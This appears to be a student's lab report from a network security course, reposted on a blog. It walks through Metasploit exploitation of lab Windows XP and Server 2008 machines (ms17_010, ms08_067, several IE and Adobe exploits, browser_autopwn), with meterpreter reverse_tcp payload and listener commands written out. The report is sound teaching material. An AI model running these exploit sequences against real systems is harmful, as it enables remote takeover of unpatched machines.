2018-2019-2 20165303《网络攻防技术》Exp5 MSF基础应用
实践目标
1.一个主动攻击实践
ms17_010(成功)
ms08_067(成功)
2.一个针对浏览器的攻击
ms13-008(成功唯一)
ms11-050(失败)
ms13-069(成功唯一)
adobe_toolbutton浏览器漏洞(成功唯一)
3.一个针对客户端的攻击
adobe (Adobe_toolbutton客户端漏洞成功)
4.成功应用任何一个辅助模块
auxiliary/server/browser_autopwn(成功唯一)
问题回答
- 什么是exploit
用来打开攻击者与被攻击者的通道,将想要传送的代码传到目标靶机中,换句话说我认为就是人们大神找到的各种漏洞,你可以使用这个漏洞来攻击
- 什么是payload
真正的攻击代码,执行负载的工具,exploit将他传送到靶机后,执行程序,这个我觉得就是找到漏洞后,可以使用各种payload来连通你的主机,传送过去各种建立连接的程序
- 什么是encode
encode也就是编码,改变代码的形式,使其不容易被发现,为了隐藏并为后面的操作进行铺垫
任务一 主动攻击实践ms17_010以及ms08_067
ms17-010
- 靶机是Windows server2008
- 首先搜索ms17-010
- 然后设置payload
set payload windows/x64/meterpreter/reverse_tcp - 然后设置攻击主机和目标靶机
set lhost 192.168.1.154set rhost 192.168.1.192 - 输入exploit进行攻击

- 我设置的攻击靶机是Windows server2008,可以成功攻击

ms08-067
靶机win xp sp3 英文版
首先
use exploit/windows/smb/ms08_067_netapi输入
show options看一下需要设置哪些

然后输入
show payloads看一下有什么负载

设置lhost 192.168.1.154
设置rhost 192.168.1.235

然后输入
exploit进行攻击获得权限


任务二 针对浏览器的攻击ms13-008(唯一)以及ms11-050以及ms13-069(唯一)
ms13-008
靶机win xp sp3 英文版
首先搜索ms13
search ms13

找到第一个浏览器漏洞ms13-008
然后输入
use exploit/windows/browser/ie_cbutton_uaf在输入
show options看一下需要设置哪些

设置攻击机IP地址 192.168.1.154
设置攻击机端口80
设置payload
set payload windows/meterpreter/reverse_tcp设置lhost 192.168.1.154
输入
show targets可以看到我们可以成功攻击的目标

然后输入exploit进行攻击,攻击成功


ms11-050
靶机win xp sp3 英文版
输入
use windows/browser/ms11_050_mshtml_cobjectelement输入
show options看一下需要设置什么

设置srvhost 192.168.1.154
设置srvport 80
设置
set payload windows/meterpreter/reverse_tcp

设置lhost 192.168.1.154

进行攻击exploit

攻击结果,失败了,因为靶机浏览器老是闪退,无法运行

可以看一下靶机链接的结果

我猜想可能是浏览器版本的问题
ms13-069
- 靶机win xp sp3 英文版
- 首先search ms13
- 找到ms13-069

- 设置
use exploit/windows/browser/ms13_069_caret - 看一下需要设置哪些

- 设置srvhost 192.168.1.154
- 设置srvport 80
- 设置
set payload windows/meterpreter/reverse_tcp

- 设置lhost 192.168.1.154
- 进行攻击exploit

- 攻击成功获得权限

adobe_toolbutton漏洞
靶机win xp sp3 英文版
这是我在搜索客户端Adobe漏洞这是利用Adobe browser toolbutton
首先
use exploit/windows/browser/adobe_toolbutton然后show options看一下需要设置什么

set srvhost 192.168.1.154set srvport 80set payload windows/meterpreter/reverse_tcpset lhost 192.168.1.154

然后输入exploit攻击成功

将生成的URL输入靶机浏览器生成页面

输入sessions -i 1成功获得权限

任务三 针对客户端的攻击adobe (Adobe_toolbutton漏洞)
- 靶机win xp sp3 英文版
- 首先search adobe

- 然后
use exploit/windows/fileformat/adobe_toolbutton - 生成攻击文件msf.pdf
- 将文件想办法传给靶机
- 设置监听程序
use exploit/mutil/handler - 设置攻击机IP 192.168.1.154
- 设置攻击机端口4444
- 设置
set payload windows/meterpreter/reverse_tcp - 输入exploit进行攻击

- 靶机这边使用Adobe9.0程序打开pdf

- 攻击成功


任务四 辅助模块browser autopwn(唯一)
- 靶机win xp sp3 英文版
Metasploit中提供了一个browser autopwn模块,这是一个可以用来对各种浏览器进行测试和渗透的自动化向量。
autopwn指的是自动对目标进行渗透。autopwn模块在配置了所有要使用的浏览器渗透脚本后,将处于监听模式下。然后,它便等待着一个即将到来的连接。一旦连接建立,它就会发送一系列与目标浏览器相匹配的渗透模块,具体发送哪个模块要取决于受害者浏览器的类型。无论目标系统上运行着什么浏览器,只要存在漏洞,autopwn模块就能自动发起攻击。
首先搜索autopwn

输入
use auxiliary/server/browser_autopwn设置
set payload windows/meterpreter/reverse_tcp

设置
set LHOST 192.168.1.154set URIPATH "20165303wy"输入exploit进行攻击

输入 session -i 1成功获得权限

离实战还缺些什么技术或步骤?
我认为离实战还缺的就是我们现在攻击二队系统版本都太低了,我们现在攻击的大部分都是WinXP系统以及win7系统,但是我们现在用的大部分系统都已经是win10了,而且我们攻击的浏览器漏洞大部分也是ie8或者ie9的,这些浏览器也早就不用了,没有什么攻击的意义,然后呢我么在攻击过程中还会被现在的杀软或者电脑管家给发现,隐蔽性非常低,要想真正的实战,我们还需要找到现在最新的漏洞以及攻击方式
实验总结与体会
我对本次实验的最大体会就是给你的漏洞找一个合适的靶机真的是太难了,不光是系统版本得需要匹配,你的浏览器版本也需要匹配,你的系统语言版本也需要匹配,刚开始的时候用的普通xp发现不行,后来又下载了xp sp3,但是发现还是不能用,因为他是中文版的,后来找了半天找了一万年终于找到了英文原版的xp sp3,然后发现里面的IE浏览器是ie6,又废了很大功夫找到了ie8,然后基本上后面就没什么阻碍了,这个过程虽然很复杂,不断地失望又不断地希望,最终成功做完了实验。
2018-2019-2 20165303《网络攻防技术》Exp5 MSF基础应用的更多相关文章
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...
- 20155226《网络攻防》 Exp5 MSF基础应用
20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...
- 20155318 《网络攻防》Exp5 MSF基础应用
20155318 <网络攻防>Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传 ...
- 20145236《网络攻防》Exp5 MSF基础应用
20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...
- 20155301 《网络攻防》 Exp5 MSF基础应用
20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ...
- 20155321 《网络攻防》 Exp5 MSF基础应用
20155321 <网络攻防> Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode 关于exploit,我觉得exploit是利用一些工具 ...
- 20155338 《网络攻防》Exp5 MSF基础应用
20155338 <网络攻防>Exp5 MSF基础应用 基础问题回答 1. 用自己的话解释什么是exploit,payload,encode? exploit将真正要负责攻击的代码传送到靶 ...
- 2015306 白皎 《网络攻防》Exp5 MSF基础应用
2015306 白皎 <网络攻防>Exp5 MSF基础应用 一.基础问题 用自己的话解释什么是exploit,payload,encode. exploit指由攻击者或渗透测试者利用一个系 ...
- 20155334 《网络攻防》Exp5 MSF基础应用
一.基础问题回答 解释exploit,payload,encode是什么: 项目 作用 exploit 是负载有用代码的交通工具,让代码到达目的地,并作用 payload 是有具体功能的代码,能够完成 ...
- 20155211 网络攻防技术 Exp08 Web基础
20155211 网络攻防技术 Exp08 Web基础 实践内容 Web前端HTML,能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML. We ...
随机推荐
- 构建RN或Weex项目时,使用Android Studio常遇到的问题
1 . androidStudio报错No cached version available for offline mode 解决方法 原因是之前为了提高编译速度,在Gradle设置选项中开启了Of ...
- Centos7下使用Ceph-deploy快速部署Ceph分布式存储-操作记录
之前已详细介绍了Ceph分布式存储基础知识,下面简单记录下Centos7使用Ceph-deploy快速部署Ceph环境: 1)基本环境 192.168.10.220 ceph-admin(ceph-d ...
- linux下chromedriver的安装
很多时候,发现phantomjs被一些网站屏蔽导致我们无法达到想要的结果,一方面phantomjs也停止维护,这时候们可以使用chromedriver(谷歌)或者firefoxdriver(火狐)来代 ...
- Java基础(运算符)
Java中的运算符: 算术运算符:+ - * / % ++ -- %运算符叫取模:它就是取余的例如:43%7=1 其他的都是和数学里的运算符一样(不过在字符串中如果是两个字符串 ...
- jpa报错:Table 'dev-test.hibernate_sequence' doesn't exist
Hibernate 能够出色地自动生成主键.Hibernate/EBJ 3 注释也可以为主键的自动生成提供丰富的支持,允许实现各种策略.其生成规则由@GeneratedValue设定的.这里的@id和 ...
- C#中的委托(delegate)(个人整理)
Delegate 一.什么是委托? 委托是一种引用类型,它是函数指针的托管版本.在C#中,委托是一种可以把引用存储为函数的类型.委托可以引用实例和静态方法,而函数指针只能引用静态方法.委托的声明非常类 ...
- Visual Studio Git本地Repos和GitHub远程Repos互操作
近期准备将一个项目开源到GitHub中,N-Sharding,.Net版本的分库分表数据访问框架.中间遇到了点小问题,整理了一下. 1. GitHub上Create New Repos 2. 代码Ch ...
- python locust 性能测试:嵌套
TaskSet类和TaskSequence类可用于嵌套<可以在TaskSequences中嵌套TaskSets,反之亦然>: from locust import TaskSet, tas ...
- mysql_study_5
代码 mysql> CREATE TABLE shop ( ) UNSIGNED ZEROFILL ' NOT NULL, ) DEFAULT '' NOT NULL, ,) DEFAULT ' ...
- 第十七节 Cookie基础与应用
什么是cookie:其实就是页面用来保存信息:比如,自动登录.记住用户名 cookie的特性:(以域名为单位的) 同一个网站(同一个域名)中所有页面共享一套cookie 数量.大小有限,跟浏览器有关, ...